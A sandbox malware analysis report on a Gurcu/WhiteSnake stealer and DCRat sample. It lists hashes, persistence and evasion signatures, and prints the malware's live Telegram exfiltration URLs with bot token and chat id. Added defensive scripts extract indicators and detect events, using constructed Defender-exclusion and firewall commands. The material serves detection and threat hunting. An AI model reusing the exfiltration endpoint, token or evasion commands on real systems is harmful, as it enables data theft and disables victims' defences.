Resubmissions

23-10-2024 02:31

241023-czs5ssydnj 10

23-10-2024 02:28

241023-cygelsxakf 10

General

  • Target

    PedikClient.exe

  • Size

    1.7MB

  • Sample

    241023-cygelsxakf

  • MD5

    28d6347c722e5cac5ae9245b16d4754c

  • SHA1

    45a79b7368ec79516ab1772188bec1b36c43d498

  • SHA256

    eb0e511e7656cf46b8632c82afd2c54fc28ca897fc852229839d67e9a23700e1

  • SHA512

    643465e266e0bd5b2659d68bd3752cd53c88be29f3fe1805523196c1b3720279e34919f4a6d53c1e3a867f3b1d5c38c4abb8c7d68cce13cc11e62de911aac181

  • SSDEEP

    49152:MfZ8c3XIwfnWpiDwDFyeEPk3Oy89y1iRW4SEXtTd15:MhVXIwfIdceEPk3O/y1iRW4SutJ15

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendPhoto?chat_id=7706607495&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%E2%80%A2%20Comment%3A%20Arbuzik%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20RPHBTALT%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20138.199.29.44%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CGoogle%5Cdwm.ex

https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendDocument?chat_id=7706607495&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.371713
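Both C2 entries above are calls to the Telegram Bot API, with the victim fingerprint carried URL-encoded in the `caption` parameter. The script below is an added example, not code from the sandbox or from the malware: it splits such URLs into bot token, method, chat_id and the decoded "• Key: Value" caption lines, then separates the operator-side indicators (token, chat id, build comment, install path) from the fields that describe the infected machine. The IP and GEO values are the analysis VM's own egress address, obtained through the external-IP lookup the report flags further down, and are deliberately not reported as attacker infrastructure. Assumptions: the caption layout is inferred from these two URLs only, the "Comment" field being an operator-chosen build tag is an interpretation, and the Working Directory value is kept exactly as the report shows it, cut off at "dwm.ex".

```python
"""Pull indicators out of Telegram Bot API exfiltration URLs.

Added example for this report; not the sandbox's code and not the malware's.
Input: the two C2 URLs from the Malware Config section, copied verbatim
(the Working Directory value is cut off at "dwm.ex" in the report itself).
"""
import re
from urllib.parse import parse_qs, urlsplit

# A bot token is "<numeric bot id>:<secret>"; the Bot API method is the last path part.
BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)$")

C2_URLS = [
    "https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendPhoto"
    "?chat_id=7706607495&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID"
    "%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%E2%80%A2%20Comment%3A%20Arbuzik%0A%0A"
    "%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20RPHBTALT%0A%E2%80%A2%20OS"
    "%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20138.199.29.44%0A%E2%80%A2%20GEO"
    "%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files"
    "%20(x86)%5CGoogle%5Cdwm.ex",
    "https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendDocument"
    "?chat_id=7706607495&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID"
    "%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%0A%E2%80%A2%20Scanned%20Directories%3A"
    "%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.371713",
]

# Caption fields that describe the infected (here: sandbox) machine, not the operator.
# IP and GEO come from the external-IP lookup the report flags; they are the analysis
# VM's egress address and must not be treated as attacker infrastructure.
VICTIM_FIELDS = {"User Name", "PC Name", "OS Info", "IP", "GEO",
                 "Scanned Directories", "Elapsed Time"}


def parse_telegram_c2(url):
    """Split one Bot API URL into token, method, chat_id, title and '• Key: Value' fields."""
    parts = urlsplit(url)
    if parts.netloc.lower() != "api.telegram.org":
        raise ValueError("not a Telegram Bot API URL: " + url)
    m = BOT_PATH.match(parts.path)
    if m is None:
        raise ValueError("unrecognised bot path: " + parts.path)
    query = parse_qs(parts.query)              # percent-decodes values as UTF-8
    caption = query.get("caption", [""])[0]
    lines = [ln.strip() for ln in caption.split("\n")]
    fields = {}
    for ln in lines[1:]:                       # line 0 is the decorated title
        key, sep, value = ln.lstrip("\u2022").strip().partition(": ")
        if sep:                                # blank spacer lines have no separator
            fields[key] = value
    return {
        "bot_id": m["bot_id"],
        "token": m["bot_id"] + ":" + m["secret"],
        "method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
        "title": lines[0] if lines else "",
        "fields": fields,
    }


def extract_iocs(urls):
    """Aggregate operator-side indicators across URLs; victim-side fields are dropped."""
    iocs = {"telegram_tokens": set(), "telegram_chat_ids": set(), "bot_methods": set(),
            "victim_ids": set(), "build_tags": set(), "install_paths": set()}
    for url in urls:
        p = parse_telegram_c2(url)
        iocs["telegram_tokens"].add(p["token"])
        iocs["telegram_chat_ids"].add(p["chat_id"])
        iocs["bot_methods"].add(p["method"])
        f = {k: v for k, v in p["fields"].items() if k not in VICTIM_FIELDS}
        if "ID" in f:                 # per-victim identifier generated by the stealer
            iocs["victim_ids"].add(f["ID"])
        if "Comment" in f:            # assumption: operator-chosen build tag
            iocs["build_tags"].add(f["Comment"])
        if "Working Directory" in f:  # where the sample installed itself
            iocs["install_paths"].add(f["Working Directory"])
    return {k: sorted(v) for k, v in iocs.items()}


if __name__ == "__main__":
    for name, values in extract_iocs(C2_URLS).items():
        print(name, values)
```

The token and chat_id are the pieces worth blocking or hunting for in proxy logs (any request to api.telegram.org whose path begins with `/bot7836713809:` belongs to this operator); the ID, Comment and Working Directory fields are the ones to pivot on across other submissions of the same builder.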

Targets

    • Target

      PedikClient.exe

    • Size

      1.7MB

    • MD5

      28d6347c722e5cac5ae9245b16d4754c

    • SHA1

      45a79b7368ec79516ab1772188bec1b36c43d498

    • SHA256

      eb0e511e7656cf46b8632c82afd2c54fc28ca897fc852229839d67e9a23700e1

    • SHA512

      643465e266e0bd5b2659d68bd3752cd53c88be29f3fe1805523196c1b3720279e34919f4a6d53c1e3a867f3b1d5c38c4abb8c7d68cce13cc11e62de911aac181

    • SSDEEP

      49152:MfZ8c3XIwfnWpiDwDFyeEPk3Oy89y1iRW4SEXtTd15:MhVXIwfIdceEPk3O/y1iRW4SutJ15

    • DcRat

      DarkCrystal (DCRat) is a .NET RAT, active since June 2019, that can load additional plugins.

    • Gurcu, WhiteSnake

      Gurcu (also tracked as WhiteSnake) is an information stealer written in C#.

    • Modifies WinLogon for persistence

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • UAC bypass

    • DCRat payload

      Detects the DCRat payload, which is commonly dropped by NSIS installers.

    • Boot or Logon Autostart Execution: Active Setup

      Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

    • Disables Task Manager via registry modification

    • Modifies Windows Firewall

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials and other sensitive material.

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Checks whether UAC is enabled

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory
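The signature list above names the persistence and defence-evasion behaviours the sandbox observed (Winlogon, Run key, Active Setup, Task Manager policy, Defender exclusions via PowerShell, firewall changes, a process spawning an unexpected child) but not how to recognise them on a host outside the sandbox. The script below is an added example, not the sandbox's own detection logic: it runs one rule per behaviour over Sysmon-style registry-set (Event ID 13) and process-create (Event ID 1) records and maps each hit to the ATT&CK Enterprise technique it corresponds to. The events are constructed for the example (paths, SID and GUID are made up and are not taken from the report). The report does not say how this sample changes the firewall or Defender settings, so `netsh advfirewall` and `Add-MpPreference` are assumed forms; the Winlogon rule only fires when the value differs from the stock `explorer.exe` / `userinit.exe,` defaults, so a benign rewrite of the default is not flagged.

```python
"""Tag Sysmon-style events with the behaviours this report flags.

Added example, not the sandbox's detection code. SAMPLE_EVENTS are constructed
for illustration; none of them are events from the report.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "reg_set" (Sysmon EID 13) or "proc_create" (Sysmon EID 1)
    image: str           # process that wrote the value / was created
    target: str = ""     # registry value path (reg_set)
    details: str = ""    # new value (reg_set), e.g. "DWORD (0x00000001)"
    cmdline: str = ""    # command line (proc_create)
    parent: str = ""     # parent image (proc_create)


# Stock Winlogon values; anything else in these values is a logon hook.
WINLOGON_DEFAULTS = {"shell": "explorer.exe",
                     "userinit": "c:\\windows\\system32\\userinit.exe,"}
# Document handlers that have no business launching a shell (exploit/macro pattern).
DOC_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _dword(details):
    """Read the integer out of Sysmon's 'DWORD (0x00000001)' or a bare '1'."""
    m = re.search(r"0x([0-9a-f]+)|(\d+)\s*$", details.lower())
    if not m:
        return None
    return int(m.group(1), 16) if m.group(1) else int(m.group(2))


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def tag_event(e):
    """Return [(signature name as used in the report, ATT&CK technique)] for one event."""
    tags = []
    if e.kind == "reg_set":
        t = e.target.lower()
        name = _basename(t)
        if ("\\windows nt\\currentversion\\winlogon\\" in t and name in WINLOGON_DEFAULTS
                and e.details.strip().lower() != WINLOGON_DEFAULTS[name]):
            tags.append(("Modifies WinLogon for persistence", "T1547.004"))
        if re.search(r"\\currentversion\\run(once)?\\", t):
            tags.append(("Adds Run key to start application", "T1547.001"))
        if "\\active setup\\installed components\\" in t and name == "stubpath":
            tags.append(("Boot or Logon Autostart Execution: Active Setup", "T1547.014"))
        if t.endswith("\\policies\\system\\disabletaskmgr") and _dword(e.details) == 1:
            tags.append(("Disables Task Manager via registry modification", "T1562.001"))
        if "\\windows defender\\exclusions\\" in t:
            tags.append(("Modifies Windows Defender exclusions", "T1562.001"))
        if "\\sharedaccess\\parameters\\firewallpolicy\\" in t:
            tags.append(("Modifies Windows Firewall", "T1562.004"))
    elif e.kind == "proc_create":
        img, cl = _basename(e.image), e.cmdline.lower()
        if img in ("powershell.exe", "pwsh.exe") and "add-mppreference" in cl and "-exclusion" in cl:
            tags.append(("Command and Scripting Interpreter: PowerShell", "T1059.001"))
        if img == "netsh.exe" and "advfirewall" in cl:
            tags.append(("Modifies Windows Firewall", "T1562.004"))
        if _basename(e.parent) in DOC_PARENTS and img in SHELLS:
            # The report's signature carries no technique ID; none is assigned here.
            tags.append(("Process spawned unexpected child process", None))
    return tags


def classify(events):
    """Return [(event index, signature, technique)] for every rule that fires."""
    return [(i, sig, tech) for i, e in enumerate(events) for sig, tech in tag_event(e)]


def techniques(events):
    """Sorted, de-duplicated technique IDs, the shape of the report's MITRE section."""
    return sorted({tech for _, _, tech in classify(events) if tech})


DROPPED = "C:\\Users\\Admin\\AppData\\Roaming\\svc\\client.exe"   # constructed drop path
SID = "HKU\\S-1-5-21-1111-2222-3333-1001"                           # constructed user hive
SAMPLE_EVENTS = [  # constructed for this example; not events from the report
    Event("reg_set", DROPPED, target="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell",
          details="explorer.exe, " + DROPPED),
    Event("reg_set", "C:\\Windows\\System32\\svchost.exe",           # benign: stock value rewritten
          target="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit",
          details="C:\\Windows\\system32\\userinit.exe,"),
    Event("reg_set", DROPPED, target=SID + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\client",
          details=DROPPED),
    Event("reg_set", DROPPED, details=DROPPED,
          target="HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{0CE1F6D1-0000-0000-0000-000000000001}\\StubPath"),
    Event("reg_set", DROPPED, target=SID + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr",
          details="DWORD (0x00000001)"),
    Event("proc_create", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent=DROPPED,
          cmdline="powershell -NoProfile -WindowStyle Hidden Add-MpPreference -ExclusionPath "
                  "'C:\\Users\\Admin\\AppData\\Roaming\\svc' -ExclusionExtension 'exe'"),
    Event("proc_create", "C:\\Windows\\System32\\netsh.exe", parent=DROPPED,
          cmdline='netsh advfirewall firewall add rule name="client" dir=in action=allow program="' + DROPPED + '"'),
    Event("proc_create", "C:\\Windows\\System32\\cmd.exe", cmdline="cmd.exe /c start client.exe",
          parent="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"),
]

if __name__ == "__main__":
    for i, sig, tech in classify(SAMPLE_EVENTS):
        print(i, tech or "-", sig)
```

Registry reads such as the Uninstall-key enumeration and the UAC check in the list above are not covered: Sysmon records value writes, not reads, so those behaviours are only visible in a sandbox or with an API-level monitor.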

MITRE ATT&CK Enterprise v15